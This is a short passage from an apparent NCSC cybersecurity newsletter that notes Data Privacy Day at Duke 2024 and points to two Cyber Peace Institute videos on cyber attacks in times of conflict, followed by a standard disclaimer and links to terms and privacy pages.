Data Privacy Day at Duke 2024 was on February 2nd
Two videos this week from the Cyber Peace Institute and their Cyber Attacks in Times of Conflict Video Series
Unless stated otherwise, linked or referenced content does not necessarily represent the views of the NCSC and reference to third parties or content on their websites should not be taken as endorsement of any kind by the NCSC. The NCSC has no control over the content of third party websites and consequently accepts no responsibility for your use of them.
This newsletter is subject to the NCSC website terms and conditions which can be found at https://www.ncsc.gov.uk/section/about-this-website/terms-and-conditions and you can find out more about how we will treat your personal information in our privacy notice at https://www.ncsc.gov.uk/section/about-this-website/privacy-statement.